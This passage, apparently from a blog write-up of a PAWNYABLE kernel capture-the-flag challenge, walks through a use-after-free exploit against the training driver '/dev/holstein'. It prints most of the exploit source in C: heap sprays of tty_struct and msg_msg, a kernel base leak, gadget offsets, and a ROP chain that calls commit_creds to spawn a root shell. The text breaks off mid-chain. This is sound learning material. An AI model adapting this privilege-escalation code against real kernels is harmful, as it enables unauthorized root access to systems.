        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite the tty_struct-&gt;ops pointer with ROP address</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">fake_table</span><span class="p">;</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to write enough bytes to fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.</p>

<p>As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of <code class="language-plaintext highlighter-rouge">msg_msg</code> structs was enough to get me hooked. Here is a picture of the exploit in action:
<img src="/assets/images/pwn/exploit_works.PNG" alt="" /></p>

<h2 id="miscellaneous">Miscellaneous</h2>

<p>There were some things I tried to do to increase the exploit’s reliability.</p>

<p>One was to check the magic value in the leaked <code class="language-plaintext highlighter-rouge">tty_structs</code> to make sure a <code class="language-plaintext highlighter-rouge">tty_struct</code> had actually filled our freed memory and not another object. This is extremely convenient! All <code class="language-plaintext highlighter-rouge">tty_structs</code> have <code class="language-plaintext highlighter-rouge">0x5401</code> at <code class="language-plaintext highlighter-rouge">tty-&gt;magic</code>.</p>

<p>Another thing I did was spray <code class="language-plaintext highlighter-rouge">msg_msg</code> structs with an easily recognizable message type of <code class="language-plaintext highlighter-rouge">0x1337</code>. This way when leaked, I could easily verify I was in fact leaking <code class="language-plaintext highlighter-rouge">msg_msg</code> contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with <code class="language-plaintext highlighter-rouge">0xffff</code>.</p>

<p>Finally, there was the patching of the clean-up-related function pointers in <code class="language-plaintext highlighter-rouge">tty-&gt;ops</code>.</p>

<h2 id="further-reading">Further Reading</h2>

<p>There are lots of challenges besides the UAF one on PAWNYABLE, please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me and in the almost month since I finished this challenge, I have learned a ton. Special thanks to <a href="https://twitter.com/chompie1337">@chompie1337</a> for letting me complain and giving me helpful advice/resources.</p>

<p>Some awesome blogposts I read throughout the learning process up to this point include:</p>

<ul>
  <li>https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel</li>
  <li>https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</li>
  <li>https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/</li>
  <li>https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</li>
</ul>

<h2 id="exploit-code">Exploit Code</h2>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// One liner to add exploit to filesystem</span>
<span class="c1">// gcc exploit.c -o exploit -static &amp;&amp; cp exploit rootfs &amp;&amp; cd rootfs &amp;&amp; find . -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs.cpio &amp;&amp; cd ../</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="c1"> /* int_t's */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* getuid */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ipc.h&gt;</span><span class="c1"> /* msg_msg */ </span><span class="cp">
#include</span> <span class="cpf">&lt;sys/msg.h&gt;</span><span class="c1"> /* msg_msg */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ioctl.h&gt;</span><span class="c1"> /* ioctl */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdarg.h&gt;</span><span class="c1"> /* va_args */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdbool.h&gt;</span><span class="c1"> /* true, false */ </span><span class="cp">
</span>
<span class="cp">#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"
</span>
<span class="cp">#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver
</span>
<span class="c1">// User state globals</span>
<span class="kt">uint64_t</span> <span class="n">user_cs</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_ss</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_rflags</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">user_sp</span><span class="p">;</span>

<span class="c1">// Mutable globals, when in Rome</span>
<span class="kt">uint64_t</span> <span class="n">base</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">rop_addr</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">fake_table</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">ioctl_ptr</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">open_ptmx</span><span class="p">[</span><span class="n">PTMX_SPRAY</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>          <span class="c1">// Store fds for clean up/ioctl()</span>
<span class="kt">int</span> <span class="n">num_ptmx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>                           <span class="c1">// Number of open fds</span>
<span class="kt">int</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">NUM_QUEUE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>           <span class="c1">// Initialized message queues</span>
<span class="kt">int</span> <span class="n">num_queue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Misc constants. </span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">rop_len</span> <span class="o">=</span> <span class="mi">200</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">ioctl_off</span> <span class="o">=</span> <span class="mi">12</span> <span class="o">*</span> <span class="nf">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">);</span>

<span class="c1">// Gadgets</span>
<span class="c1">// 0x723c0: commit_creds</span>
<span class="kt">uint64_t</span> <span class="n">commit_creds</span><span class="p">;</span>
<span class="c1">// 0x72560: prepare_kernel_cred</span>
<span class="kt">uint64_t</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span>
<span class="c1">// 0x800e10: swapgs_restore_regs_and_return_to_usermode</span>
<span class="kt">uint64_t</span> <span class="n">kpti_tramp</span><span class="p">;</span>
<span class="c1">// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)</span>
<span class="kt">uint64_t</span> <span class="n">push_rdx</span><span class="p">;</span>
<span class="c1">// 0x35738d: pop rdi; ret;</span>
<span class="kt">uint64_t</span> <span class="n">pop_rdi</span><span class="p">;</span>
<span class="c1">// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;</span>
<span class="kt">uint64_t</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span>
<span class="c1">// 0x32afea: ret;</span>
<span class="kt">uint64_t</span> <span class="n">ret</span><span class="p">;</span>

<span class="kt">void</span> <span class="nf">err</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[!] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">info</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[*] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">save_state</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__asm__</span><span class="p">(</span>
        <span class="s">".intel_syntax noprefix;"</span>   
        <span class="s">"mov user_cs, cs;"</span>
        <span class="s">"mov user_ss, ss;"</span>
        <span class="s">"mov user_sp, rsp;"</span>
        <span class="c1">// Push CPU flags onto stack</span>
        <span class="s">"pushf;"</span>
        <span class="c1">// Pop CPU flags into var</span>
        <span class="s">"pop user_rflags;"</span>
        <span class="s">".att_syntax;"</span>
    <span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Should spawn a root shell</span>
<span class="kt">void</span> <span class="nf">pop_shell</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">uid_t</span> <span class="n">uid</span> <span class="o">=</span> <span class="n">getuid</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">uid</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"We are not root, wtf?"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"We got root, spawning shell!"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Open a char device, just exit on error, this is exploit code</span>
<span class="kt">int</span> <span class="nf">open_device</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">dev</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dev</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"NULL ptr given to `open_device()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">dev</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to open '%s'"</span><span class="p">,</span> <span class="n">dev</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fd</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap</span>
<span class="kt">void</span> <span class="nf">alloc_ptmx</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/ptmx"</span><span class="p">,</span> <span class="n">O_RDONLY</span> <span class="o">|</span> <span class="n">O_NOCTTY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to open /dev/ptmx"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">open_ptmx</span><span class="p">[</span><span class="n">num_ptmx</span><span class="p">]</span> <span class="o">=</span> <span class="n">fd</span><span class="p">;</span>
    <span class="n">num_ptmx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Check to see if we have a reference to a tty_struct by reading in the magic</span>
<span class="c1">// number for the current allocation in our slab</span>
<span class="n">bool</span> <span class="nf">found_ptmx</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">magic_buf</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `found_ptmx()`</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">magic_buf</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">bytes_read</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int32_t</span> <span class="o">*</span><span class="p">)</span><span class="n">magic_buf</span> <span class="o">!=</span> <span class="mh">0x5401</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Leak a tty_struct-&gt;ops field which is constant offset from kernel base</span>
<span class="kt">uint64_t</span> <span class="nf">leak_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `leak_ops()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */</span>

    <span class="c1">// Read first 32 bytes of the structure</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ops_buf</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ops_buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to allocate ops_buf"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ops_buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="mi">32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">uint64_t</span> <span class="n">ops</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"tty_struct-&gt;ops: 0x%lx"</span><span class="p">,</span> <span class="n">ops</span><span class="p">);</span>

    <span class="c1">// Solve for kernel base, keep the last 12 bits</span>
    <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">ops</span> <span class="o">&amp;</span> <span class="mi">0</span><span class="n">b111111111111</span><span class="p">;</span>

    <span class="c1">// These magic compares are for static offsets on this kernel</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xb40ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39b40ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xc60ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39c60ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Got an unexpected tty_struct-&gt;ops ptr"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">solve_gadgets</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// 0x723c0: commit_creds</span>
    <span class="n">commit_creds</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x723c0ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; commit_creds located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">commit_creds</span><span class="p">);</span>

    <span class="c1">// 0x72560: prepare_kernel_cred</span>
    <span class="n">prepare_kernel_cred</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x72560ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; prepare_kernel_cred located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span><span class="p">);</span>

    <span class="c1">// 0x800e10: swapgs_restore_regs_and_return_to_usermode</span>
    <span class="n">kpti_tramp</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x800e10ULL</span> <span class="o">+</span> <span class="mi">22</span><span class="p">;</span> <span class="c1">// 22 offset, avoid pops</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; kpti_tramp located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">kpti_tramp</span><span class="p">);</span>

    <span class="c1">// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;</span>
    <span class="n">push_rdx</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x14fbeaULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; push_rdx located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">push_rdx</span><span class="p">);</span>

    <span class="c1">// 0x35738d: pop rdi; ret;</span>
    <span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x35738dULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; pop_rdi located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pop_rdi</span><span class="p">);</span>

    <span class="c1">// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;</span>
    <span class="n">xchg_rdi_rax</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x487980ULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; xchg_rdi_rax located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">xchg_rdi_rax</span><span class="p">);</span>

    <span class="c1">// 0x32afea: ret;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="mh">0x32afeaULL</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"    &gt;&gt; ret located @ 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Initialize a kernel message queue</span>
<span class="kt">int</span> <span class="nf">init_msg_q</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">msg_qid</span> <span class="o">=</span> <span class="n">msgget</span><span class="p">(</span><span class="n">IPC_PRIVATE</span><span class="p">,</span> <span class="mo">0666</span> <span class="o">|</span> <span class="n">IPC_CREAT</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msg_qid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`msgget()` failed to initialize queue"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span><span class="p">]</span> <span class="o">=</span> <span class="n">msg_qid</span><span class="p">;</span>
    <span class="n">num_queue</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Allocate one msg_msg on the heap</span>
<span class="kt">size_t</span> <span class="nf">send_message</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Calcuate current queue</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">num_queue</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`send_message()` called with no message queues"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="kt">int</span> <span class="n">curr_q</span> <span class="o">=</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Send message</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">msgbuf</span> <span class="p">{</span>
        <span class="kt">long</span> <span class="n">mtype</span><span class="p">;</span>
        <span class="kt">char</span> <span class="n">mtext</span><span class="p">[</span><span class="n">MSG_SZ</span><span class="p">];</span>
    <span class="p">}</span> <span class="n">msg</span><span class="p">;</span>

    <span class="c1">// Unique identifier we can use</span>
    <span class="n">msg</span><span class="p">.</span><span class="n">mtype</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="c1">// Construct the ROP chain</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">);</span>

    <span class="c1">// Pattern for offsets (debugging)</span>
    <span class="kt">uint64_t</span> <span class="n">base</span> <span class="o">=</span> <span class="mh">0x41</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">25</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="n">fill</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">56</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">48</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">40</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">24</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span><span class="p">;</span>
        
        <span class="o">*</span><span class="n">curr</span><span class="o">++</span> <span class="o">=</span> <span class="n">fill</span><span class="p">;</span>
        <span class="n">base</span><span class="o">++</span><span class="p">;</span> 
    <span class="p">}</span>

    <span class="c1">// ROP chain</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rop</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">pop_rdi</span><span class="p">;</span> 
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="c1">// RAX now holds ptr to new creds</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span> <span class="c1">// Place creds into RDI </span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="c1">// Now we have super powers</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">kpti_tramp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rax inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rdi inside kpti_tramp</span>
